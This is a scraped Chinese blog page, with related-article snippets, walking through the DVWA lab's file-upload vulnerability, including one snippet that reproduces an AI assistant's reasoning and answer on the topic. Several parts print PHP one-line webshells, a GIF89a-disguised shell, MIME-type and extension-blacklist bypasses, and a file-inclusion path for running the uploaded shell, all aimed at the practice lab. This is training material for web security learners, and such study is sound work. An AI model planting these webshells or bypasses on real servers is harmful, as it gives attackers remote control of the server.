DVWA--文件上传漏洞

最新推荐文章于 2025-04-18 11:04:31 发布
最新推荐文章于 2025-04-18 11:04:31 发布
阅读量1.5k 收藏 3
点赞数 1
文章标签: DVWA 渗透测试 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43871760/article/details/103299960
版权
本文详细介绍了DVWA中的文件上传漏洞,从LOW到IMPOSSIBLE级别的安全设置,并展示了如何利用Burp Suite进行绕过。讨论了包括文件头校验、后缀名黑白名单、内容检查等防御手段,以及客户端和服务器端的绕过策略,如文件类型、文件头和后缀名绕过,配合文件包含漏洞和服务器解析漏洞等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文件上传漏洞定义
文件上传漏洞通常是由于上传文件的类型、内容没有进行严格的过滤检查,使得可以通过上传webshell获取服务器权限,因此文件上传漏洞带来的危害通常是毁灭性的。
文件上传漏洞的前提

  1. 能上传的木马
  2. 上传的木马可执行
  3. 还要清楚上传后的路径

实现过程
LOW级别
源码
在这里插入图片描述
basename(path,suffix):返回path中的文件名部分,如果可选参数suffix为空,则返回的文件名中包含文件后缀名,反之不包含文件后缀名。
由源码可知暂时并没有进行任何过滤;
(1)创建1.php并上传
1.php:<?php phpinfo();?>
在这里插入图片描述
可发现上传成功,服务器未做任何限制,此时再次访问上传路径
http://192.168.254.128/dvwa/hackable/uploads/1.php#
在这里插入图片描述
上传并执行php文件,说明存在文件上传漏洞
(2)上传一句话木马
b.php:<?php @eval($_POST[cmd]);?>
在这里插入图片描述
http://192.168.254.128/dvwa/hackable/uploads/b.php#

页面没有报错说明上传成功
打开中国菜刀,并且写入路径<

最低0.47元/天 解锁文章
ST小姐姐
关注
DVWA-File Upload/文件上传漏洞
jammny
11-22 1329
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿去dvwa的原因。 DVWA下载与安装: https://blog..
DVWA文件上传漏洞
极光时流
03-31 719
Low 没有进行任何过滤 首相,上传一个phpinfo.php,其内代码如下: <?php phpinfo(); ?> 上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php 然后访问 首先,写好 说明存在上传和执行漏洞 上传一句话木马: <?php @eval($_POST[“hack”]); ?>...
DVWA~文件上传漏洞
里丘~班诺的小屋
05-09 1245
靶机介绍 实验原理 文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 SQL注入攻击的对象是数据库服务,文件上传漏洞
DVWA File Upload 漏洞实战指南】(Low / Medium / High 全级别解析)
最新发布
weixin_40433003的博客
04-18 940
文件上传功能是 Web 应用中非常常见的一种功能,用于上传头像、文档、图片等文件。但如果验证不当,攻击者可能上传恶意脚本,进而控制服务器。在 DVWA 中,模块专门设计用于演练此类漏洞的不同防御等级。打开FileUpload的时候看到有红色的报错信息如图所示:报错一:Incorrect folder permissions: /var/www/html/dvwa/hackable/uploads/Folder is not writable.文件夹权限不正确:文件夹不可写。
Dvwa文件上传漏洞
JBlock的博客
11-16 4254
今天到了比较有意思的地方,一句话我们要传木马啦!这个就比较有意思了,毕竟我们查找漏洞最想要的效果之一就是传马成功,获得我们想要的权限。 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 因为我用的web容器是Apache,所以暂且只介绍Apache的文件解析漏洞。 比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,A
dvwa中的文件上传漏洞
无痕的博客
01-12 9813
dvwa漏洞环境演示文件上传漏洞
DVWA-master.zip
09-16
8. 文件上传漏洞:如果上传功能没有严格限制,攻击者可能上传恶意文件并执行,如PHP后门。 9. 功能滥用:某些功能可能被设计得过于强大,没有适当的权限控制,攻击者可以利用这些功能进行非法操作。 为了更好地...
DVWA-master 靶场环境
02-22
它模拟了一个典型的Web应用程序,其中包含了大量的常见安全漏洞,例如SQL注入、跨站脚本(XSS)、文件上传漏洞等。这些漏洞是故意设计的,目的是为了给学习者提供一个实际操作的机会,让他们在安全的环境下学习如何...
DVWA-master.rar
03-15
安装PHPStudy后,将DVWA-master目录中的所有文件上传至PHPStudy的Web根目录。 3. **数据库配置**: 在DVWA源代码中,找到`config.inc.php`文件,配置你的MySQL数据库连接信息,包括数据库名、用户名、密码和主机地址...
DVWA文件上传漏洞
HoYim
03-27 868
文件上传漏洞 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 1 Webshell简介 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,...
DVWA文件上传漏洞
sunshine1_0的博客
01-20 2057
文件上传漏洞 低级别 中等级别 高级别
DVWA 文件上传漏洞
QYbkx974的博客
11-16 1511
本次将通过从低到高三个等级的漏洞讲解 DVWA 靶场的文件上传漏洞
DVWA文件上传漏洞
m0_61851859的博客
02-05 467
(1)通过$_FILES预定义变量获取上传文件的文件名(name)、文件类型(type)和文件大小(size)这是三个数据分别赋给三个变量$uploaded_name、$uploaded_type、$uploaded_size。(3)因此,medium级别主要是判断文件的类别和大小,代码中对于文件大小的限制一般文件都可以满足要求,因此主要分析文件上传的类型。(8)综上,low级别对上传的文件类型没有任何防范,其初衷是想要用户只能上传图片,而现在可以上传php文件,而且能够被网站解析。
DVWA文件上传漏洞(upload)
kirito_pio的博客
06-04 2000
目录 1、low级别(直接上传) 1.1 上传文件 1.2验证 2、medium级别(使用Burp Suite进行代理) 2.1 进行代理配置 2.2 文件上传 2.3 验证 3、high级别(进行文件合并) 3.1 文件创建 3.2上传及验证 1、low级别(直接上传) <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable..
DVWA -File Upload fi
03-24
<think>嗯,用户想了解DVWA中的文件上传功能的安全测试或漏洞利用方法。首先,我需要回忆一下DVWA的基本情况。DVWA是一个用于练习Web应用漏洞的靶场,文件上传漏洞是常见的漏洞类型之一。用户可能需要从基础的上传恶意文件开始,逐步深入。 首先,安全测试通常包括绕过客户端验证。DVWA可能有不同安全等级的设置,比如Low级别可能只在前端做检查,而High级别可能有更严格的后端验证。例如,在Low级别下,用户可以直接上传PHP文件,因为服务器可能没有验证文件类型或内容。这时候需要指导用户如何修改前端代码,比如删除JavaScript验证,或者使用Burp Suite拦截请求修改文件类型。 接下来是绕过MIME类型检查。服务器可能会检查Content-Type,比如image/jpeg。这时候需要将恶意文件的Content-Type改为允许的类型,这可能通过Burp Suite修改请求头来实现。 然后是绕过扩展名检查。有些服务器通过黑名单来阻止危险扩展名,但可能遗漏某些情况,比如.php5、.phtml等。用户可以尝试上传这些变种扩展名,或者利用双扩展名如test.php.jpg来绕过检查。 对于内容检查,服务器可能检测文件头,比如GIF文件的GIF89a标识。用户可以在恶意文件前添加这些标识,伪装成图片文件,同时保留PHP代码。这需要一定的混淆技巧。 在漏洞利用方面,上传Web Shell是常见方法,比如使用一句话木马<?php system($_GET['cmd']); ?>,然后通过浏览器访问该文件执行系统命令。结合其他漏洞如文件包含漏洞,可以进一步利用,比如通过路径遍历上传文件到非预期目录,或者利用本地文件包含执行上传的恶意文件。 防御措施方面,应该提到白名单验证、重命名文件、存储文件到非Web目录、使用安全扫描工具等方法。例如,引用中的nikto工具可以用来检测常见错误配置,而sqlmap用于SQL注入测试,但文件上传漏洞可能需要其他工具。 需要确保用户理解不同安全等级(Low、Medium、High)的差异,并针对不同等级给出具体方法。例如,High级别可能需要更复杂的绕过技巧,比如结合服务器解析漏洞。同时,提醒用户注意法律和道德规范,仅在授权环境下测试。 最后,生成的相关问题需要覆盖漏洞原理、工具使用、防御措施和结合其他漏洞的情况,确保全面性。需要检查引用中的资料是否相关,比如引用3提到的nikto可以用来检查配置错误,引用4的sqlmap可能与文件上传无关,但用户的问题可能涉及综合测试。</think>### DVWA文件上传漏洞安全测试与利用方法 --- #### 一、漏洞原理 DVWA文件上传功能存在未严格验证文件类型、内容及路径的风险,攻击者可上传Web Shell(如PHP恶意文件)实现远程代码执行[^1]。漏洞等级分为低、中、高三种安全模式,对应不同防御强度。 --- #### 二、安全测试步骤 1. **基础文件上传测试** - **低安全级别**:直接上传`.php`文件(如`shell.php`),验证服务器是否允许执行 ```php <?php system($_GET['cmd']); ?> ``` - **绕过客户端验证**:禁用JavaScript或修改前端代码删除文件类型检查[^5] 2. **绕过MIME类型检查** - 使用Burp Suite拦截请求,将`Content-Type: application/php`改为`image/jpeg`[^3] 3. **绕过扩展名黑名单** - 尝试`.php5`、`.phtml`或双扩展名如`shell.php.jpg` 4. **绕过内容检查** - 在PHP文件头部添加图片标识(如`GIF89a`),伪装成图片: ```php GIF89a <?php system($_GET['cmd']); ?> ``` --- #### 三、漏洞利用示例 1. **Web Shell执行命令** - 上传成功后访问`http://靶机地址/hackable/uploads/shell.php?cmd=whoami`,可返回当前系统用户[^4] 2. **结合文件包含漏洞** - 若存在LFI漏洞,通过路径遍历执行上传文件: ``` http://靶机地址/vulnerabilities/fi/?page=../../uploads/shell.php ``` --- #### 四、防御措施 1. 使用白名单验证文件扩展名和MIME类型 2. 重命名上传文件(如`md5(时间戳).jpg`) 3. 将文件存储在非Web可访问目录[^2] 4. 部署WAF或使用`nikto`扫描检测配置错误[^3] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值